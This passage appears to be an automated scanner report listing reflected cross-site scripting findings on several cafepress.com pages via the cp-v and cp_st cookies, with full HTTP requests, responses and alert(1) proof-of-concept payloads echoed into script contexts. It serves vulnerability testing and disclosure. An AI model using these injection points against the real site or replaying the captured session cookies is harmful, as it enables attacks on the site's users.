The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ddf8"-alert(1)-"05b70d2df26 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+posters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 65624 Date: Sun, 26 Dec 2010 13:47:40 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/ Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65624 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.57. http://www.cafepress.com/+posters [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+posters
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c66</script><script>alert(1)</script>78957873d50 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+posters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c0c66</script><script>alert(1)</script>78957873d50 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 65646 Date: Sun, 26 Dec 2010 13:47:37 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/ Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'c0c66</script><script>alert(1)</script>78957873d50 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+stadium-blanket
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a90"-alert(1)-"b637a8bd2b7 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59457 Date: Sun, 26 Dec 2010 13:49:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/ Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59457 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+stadium-blanket
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71ca1</script><script>alert(1)</script>6e6e4d328ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=71ca1</script><script>alert(1)</script>6e6e4d328ee ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59474 Date: Sun, 26 Dec 2010 13:49:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '71ca1</script><script>alert(1)</script>6e6e4d328ee ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.60. http://www.cafepress.com/+steins [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+steins
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 747f7"-alert(1)-"1bd54518006 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 58697 Date: Sun, 26 Dec 2010 13:47:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58697 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA747f7"-alert(1)-"1bd54518006 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.61. http://www.cafepress.com/+steins [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+steins
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddbad</script><script>alert(1)</script>e5bee7f619b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ddbad</script><script>alert(1)</script>e5bee7f619b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; 